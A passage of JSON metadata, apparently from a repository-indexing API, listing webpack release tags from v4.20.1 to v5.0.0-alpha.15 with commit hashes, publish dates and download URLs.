endency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"t